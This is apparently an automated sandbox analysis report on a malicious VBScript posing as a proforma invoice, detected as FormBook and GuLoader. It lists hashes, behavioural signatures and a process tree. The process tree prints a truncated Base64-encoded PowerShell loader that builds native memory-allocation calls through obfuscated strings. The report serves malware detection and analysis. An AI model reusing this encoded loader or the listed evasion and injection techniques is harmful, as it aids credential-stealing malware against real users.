Edit tour
Windows
Analysis Report
Unclear Proforma Invoice.vbs
Overview
General Information
| Sample Name: | Unclear Proforma Invoice.vbs |
| Analysis ID: | 680487 |
| MD5: | 2ccae65c60d12ce9d0d097db0d58cefa |
| SHA1: | 4114f1b5a7c5ded759ca00fcbb10acfb4c72085f |
| SHA256: | d85deda96531cdada16f3d37ee1ad279289c60509f37b28e0d0dac0bd7e4c4ed |
| Infos: |  |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Connects to several IPs in different countries
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 8084 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\Uncle ar Proform a Invoice. vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 1740 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBO AGUAbABzAC AAUABhAHIA YQBwAHMAeQ BrACAAQQBu AHQAaQBoAC AARAB1AGQA ZQBsAHMAYQ BjACAAZABl AHMAdQBsAC AATQB1AHIA cABoAGkAZQ BkACAATQBs AGQAcgAgAE wAbwB1AHQA aABlACAAQQ BjAGMAdQBt AGIAZQBuAH QAawAgAFAA ZQBjAHQAbw ByAGEAbABp AHMAIABEAH UAdgBlAHQA IABPAHAAcw BwAHIAdABu ACAAbgBlAG QAZABpAGUA cwAgAFUAZA BzAHYAaQBu AGcAIABBAG 4AYQBsAHkA cwBlAGEAIA BGAGEAcgBl AHMAZwBsAG 8AIABEAGUA bQBhAHIAIA BCAGwAdQBl AGIAZQBsAC AAQwBvAHUA cgBpAGQAYQ BoACAAbwBm AGYAbABpAG MAIAANAAoA IwBSAHUAbA BsAGUAcwB0 ACAATABhAG MAaAByAHkA bQBhAHQAIA BCAGEAcgB5 AHQAaAB5AG 0AIABNAGEA cgBpAHMAIA B0AG8AbABz AGUAeQBrAH UAbAAgAFUA dQBkAHMAbA B1AGsAawBl ACAAUwBhAH QAcwBiAGkA bABsAGUAIA BBAGwAdgBp AGQAZQBuAG QAIABVAGQA ZwBhAG4AZw BzAGYAbwBy ACAAVgBlAG QAZwBhACAA RgBlAHIAaQ BlAGwAdQBr AG4AIABSAG UAeQBrACAA QwBoAGEAcw BzAGUAcgAg AEUAcQB1AG EAbABsAGkA IABGAG8Acg BzAHQAZQBu ACAAbQB1AH MAawBpACAA VQBuAHAAZQ BlAGwAIABT AHAAZQBrAH QAYQAgAEoA dQBuAGcAbQ BhAG4AZAB1 AG4AIABpAG 4AZAB1AGsA dAAgAEkAcw BvAGwAIABT AGsAZQBsAG 4AZQBtAHIA awAgAEQAZw BuAGYAbAAg AEYAbwBsAG sAZQByAGUA IABBAGYAcA BhAHMAbgAg AEQAYQBsAG wAeQAgAEwA YQBuAGQAZw BhAG4AZwBz ACAASABlAG 4AcgBpAGsA cwBlAG4AIA BNAG8AbABi AG8AaABpAH MAIABTAGEA bgBlAHIAaQ BuAGcAIABH AHIAdQB0AG 4AIABTAHQA YQBrAGwAYQ BkAGUAcgBu ACAAQQByAG MAaAAgAA0A CgAkAEMAMw AyACAAPQAg AFsAYwBoAG EAcgBdADMA NAAgACsAIA AiAFoAIgAg ACsAIAAiAH cAQQAiACsA IgBsAGwAIg ArACIAbwBj ACIAKwAiAG EAdABlAFYA aQByACIAKw AiAHQAdQBh AGwATQAiAC sAIgBlACIA KwAiAG0AIg ArACIAbwBy AHkAIgAgAC sAIABbAGMA aABhAHIAXQ AzADQADQAK ACMAQwBvAG 0AbQBhAG4A ZABpAG4AZw AgAHUAbgBk AGUAcgBiAG UAIABBAHAA bwByAHIAIA BVAG4AZgB1 AHQAaQBsAC AASgB1AGwA aQBhAG4AaQ BzAHQAYgAg AEIAYQBnAG sAbABkAG4A aQBuAGcAIA BTAGUAcgBl AG4AIABDAG 8AbgB2ACAA TwBzAHQAZQ BvAHAAbABh ACAAVQBuAH AAcgBlAGYA ZQByAGEAIA BTAGEAbQBt AGUAIABTAG UAbQBpAHMA cABpAHIAYQ AgAFIAZQBn AGUAbgBzAG kAYQBuAGUA IABGAGUAaA BzAG8AIABT AGsAbwB2AC AASwBvAG0A cABsAGUAdA B0AGUAIABS AGUAZABzAG UAIABEAGkA cwBwAHUAdA BkAGEAZwAg AEYAYQB1AG MAIABTAGUA bQBpACAAZw BhAGwAYQBj AHQAIABOAG 8AcgBvAHAA aQBhAG4AaQ BjACAATQBp AGwAbABpAH MAZQBrAHUA bgAgAEIAZQ BnAHIAZQBi AHMAZAAgAE sAZABmAGEA cgAgAE0AaQ BzAG8AZwB5 ACAAVABvAH AAZgBvAHIA cwBwACAAQw BwAHIAZgAg AGwAaQB2AH MAYgBlAHQA aQAgAE8Acg BkAHIAZQAg AE0AbABkAG UAaQBuAG8A ZABvACAARQ BrAHMAYQBt AGUAbgAgAF UAZABkAGEA bgBuAGUAbA BzAGUAIAAN AAoAQQBkAG QALQBUAHkA cABlACAALQ BUAHkAcABl AEQAZQBmAG kAbgBpAHQA aQBvAG4AIA BAACIADQAK AHUAcwBpAG 4AZwAgAFMA eQBzAHQAZQ BtADsADQAK AHUAcwBpAG 4AZwAgAFMA eQBzAHQAZQ BtAC4AUgB1 AG4AdABpAG 0AZQAuAEkA bgB0AGUAcg BvAHAAUwBl AHIAdgBpAG MAZQBzADsA DQAKAHAAdQ BiAGwAaQBj ACAAcwB0AG EAdABpAGMA IABjAGwAYQ BzAHMAIABT AGsAeQBkAD EADQAKAHsA